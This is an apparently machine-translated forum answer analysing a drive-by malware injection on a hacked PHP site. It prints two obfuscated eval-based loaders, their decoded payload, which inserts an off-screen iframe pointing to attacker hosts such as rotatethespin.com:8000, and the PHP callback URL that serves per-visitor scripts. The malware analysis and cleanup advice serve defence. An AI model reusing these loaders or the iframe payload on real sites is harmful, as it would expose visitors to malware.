遗憾的是,您没有向我们提供 php 注入的完整 javascript(如果您仍有问题,请将其添加到您的问题中,以便我们对其进行解码)。但是非常感谢你分享它背后的 php !!!
删除 php 脚本确实是解决方案,但 你应该首先找出你是如何被“黑客”/“感染”的!
- 也许是一个弱密码或更确切地说是新漏洞?
- 此外,必须检查所有(拥有)(ftp/admin/cms)访问您网站的开发人员/维护人员/贡献者的计算机是否存在密码窃取/嗅探恶意软件(由于访问您/另一个受感染的网站) .
- 在您的网站/服务器上安装了 rouge 插件/模块?
- 也有可能整个服务器(及其上的所有网站)都受到损害。与您的房东联系可能是明智之举。
请注意,此类恶意软件通常会被 google 发现:他们会在此类被黑网站的索引中添加警告:“此站点可能会损害您的计算机。'
删除这个概念需要使用谷歌网站管理员工具'请求恶意软件审查'(我不知道如果你不报告你的页面是固定的,谷歌是否会在 x 时间内自动重新扫描你的页面,也不会我知道您是否可以在没有 google-webmaster 工具的情况下将您的页面报告为已修复,因此如果您不想将您的手机号码提供给 google,请注意!!!)。
如果一个base64 解码s 来自您的 php 代码的字符串aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw,一个得到 url:http://mbrowserstats.com/statE/stat.php
您受感染的 php 网站使用上述带有GET-string的 url
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
来获取自定义唯一的按需 javascript,以插入到提供给(目标!!)访问者的标记中。
为了解码插入的访问者独有的 javascript 的有效负载,我快速启动了一个解码器(它也适用于您的部分有效负载,使用字符_作为分隔符,并在这16 个基数上使用-7的偏移量)。
(部分)字符串:
解码为:
10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
if (document.getElementsByTagName('body')[0]){
我想分享我对我得到的变体的分析,以解释它是如何工作的(希望它对其他人有帮助):
我访问的网站(在 palemoon=firefox 中)突然启动了 java 并弹出了一个 cmd-box。
铬@p。
文档的“查看源代码”显示了一个混淆脚本,该脚本在标记(带有前导空格)之前“提供”(插入):html
<script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...
通过jsbeautifier.org运行它(在我添加人工解析注释之前)将其清理为:
w = window; //hmmkay, note:reused lateron
aq = "0" + "x"; //so.. '0x', smells like hex
ff = String; //haha, neat, ff is String
ff = ff.fromCharCode; //and ff is now String's fromCharCode method
try {
document["\x62ody"] ^= ~1; //I'm guessing this should fail
} catch (d21vd12v) { //so all the rest gets executed:
v = 123; //bliep? 42? Here be dragons.. aka useless
vzs = false; //ahh, can you guess where this leads?
try { //no idea why this test is here
document;
} catch (q) { //but for an infection this should NOT run
vzs = 1;
}
if (!vzs) e = w["eval"]; //false will become true so e = EVIL
if (1) { //lol, if true, ok...
//ahh, f the payload, an array (by split) of
//640 hex-numbers
f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
}
w = f; //ahh juggling w to f
s = []; //preparing s to receive the decoded string
for (i = 2 - 2; - i + 640 != 0; i += 1) { //haha, ok: ( 2-2=0; lol; i++ )
j = i; //juggle artist at it again
if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9); //9 offset
} // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
fafa = e; //ok stop juggling. fafa = EVIL
fafa(s) //there we go: EVIL(decoded string)
}
正如人们现在可以阅读的那样,他们跳过了很多圈子来欺骗病毒扫描程序。
我重新考虑了这个(为了我的理解):
w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
s += String.fromCharCode( parseInt(w[i],16) + 9 ); //decode
}
eval(s) //execute
使用我的解码器(设置为 base 16、separation character,和 offset 9)将有效载荷解码为:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
请注意,此生成的代码缩进了 2 和 3 个选项卡(业余或愚弄病毒扫描?),为了便于阅读,我删除了这些选项卡。行尾也是 CR (13dec)(作者/脚本小子是否使用较旧的 MAC?)。
所以,现在我们有了所有可以(最终)简单解释发生了什么的代码:
- PHP 脚本
curl是一个访问者/网站唯一的 javascript,用于注入服务标记
- 这个(通过 PHP)注入的 javascript 将
iframe在文档中注入一个body(在浏览器的帮助下,因为 body 还不存在),-10000px从访问页面的左侧(看不见)定位(在访问者浏览器上)和
- 注入
iframe会加载一个专门针对(在用户和用户正在访问的网站上)的外部页面(包含上帝知道什么样的混乱/恶意软件/病毒/rootkit,在我的情况下来自rotatethespin.com:8000,muruno-vaser.info:8000等epomota.com)。
我还通过使用此小书签获取文档的实时 html 来验证这一点:
javascript:(function(){ alert(document.documentElement.innerHTML); })()
这也显示了源代码中注入的 iframe 代码。
我使用下一个小书签将 iframe 移到视图中(假设只有 1 个 iframe):
javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()
自然也可以使用 firebug 和类似工具(取决于浏览器)。
我还注意到,当使用大多数基于 web 的工具(甚至 w3c 验证器)来获取受感染网站的来源时,php 没有插入 javascript,使得网站看起来没有被感染!
在尝试使用简单的 telnet 命令(安全地)获取受感染的代码时,我也遇到了这个“问题”。然而,在看到它背后的 php 代码之后,我意识到我以前很少使用 HTTP 命令(特别是引用者)。
Doing:telnet infected-site.com 80然后粘贴以下内容最终给出了受感染的标记源:
GET /path.php?page=something HTTP/1.1
主机:infected-site.com
用户代理:Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
接受:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
接受语言:nl,en-us;q=0.7,en;q=0.3
参考:http://infected-site.com/index.php
连接:关闭
请注意,这种方式也可以安全地探索(和逆向工程)iframe 等的来源!
我还注意到网站所有者的计算机也没有收到受感染的代码!这要么是因为他的机器被感染了,要么是因为分发 javascripts 的服务器没有提供脚本,因为它知道客户端机器已经被感染了。
更新:在这个答案中有一套工作工具,我今天重新检查了包含的网站(经过一夜好眠)并注入了完全不同的脚本(但仍然基于我在这个答案中解释的相同技术)。
<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
请注意,这次数字是八进制的(以 8 为基数)(,用偏移量分隔-4)。
因此,我更新了我的解码器以包含一个基数/基数设置(以及此答案中的所有相关链接),并且可以看到有效负载仍然相同(除了它指向的域之外)。
我通过谷歌搜索document\["\x62ody"\] ^= ~1找到了这个问题,它给出了(大部分是无用/受感染的)834 个结果。
我今天偶然发现的恶意软件有上面的字符串和'd21vd12v'里面非常独特的字符串,它给出了 8300(也大多是无用/受感染的)结果。
然而谷歌搜索'//此代码用于全局机器人统计'(在您在问题中提供的 php 中找到)呈现了超过 410 万个结果(至少可以追溯到 2010 年),表明 wordpress、joomla 等也是这个的受害者'技术'。
阅读其中一些链接(如this、this或this)我得到的印象是,这开始是为了欺骗搜索引擎(如谷歌)以提高页面排名的一种方式。这是以创建一个自我造成的恶意软件漏洞为代价的。
自然地,专门分发恶意软件的变体现在试图将自己隐藏在搜索引擎之外。